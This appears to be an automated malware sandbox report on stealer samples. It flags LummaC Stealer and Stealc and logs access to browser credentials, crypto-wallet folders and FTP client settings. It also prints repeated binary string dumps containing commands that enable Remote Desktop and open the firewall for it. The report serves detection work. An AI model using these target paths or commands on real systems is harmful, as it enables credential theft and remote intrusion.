                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                              Tries to harvest and steal ftp login credentials
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                              Tries to steal Crypto Currency Wallets
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: Yara matchFile source: 00000005.00000003.1097981161.000000000069D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.1098466251.000000000069D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 2R0700.exe PID: 5204, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: Process Memory Space: 2R0700.exe PID: 5204, type: MEMORYSTR
                              Source: Yara matchFile source: 46.2.pwHxMTy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 46.2.pwHxMTy.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 45.2.pwHxMTy.exe.4209550.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.2R0700.exe.980000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002E.00000002.2016617729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Yara detected Stealc
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Contains functionality to start a terminal service
                              Source: 1E08u3.exeString found in binary or memory: net start termservice
                              Source: 1E08u3.exe, 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: net start termservice
                              Source: 1E08u3.exe, 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                              Source: 1E08u3.exe, 00000002.00000003.904297823.0000000004B60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                              Source: 1E08u3.exe, 00000002.00000003.904297823.0000000004B60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                              Source: rapes.exeString found in binary or memory: net start termservice
                              Source: rapes.exe, 00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: net start termservice
                              Source: rapes.exe, 00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                              Source: rapes.exe, 00000003.00000003.941650919.00000000051C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                              Source: rapes.exe, 00000003.00000003.941650919.00000000051C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM 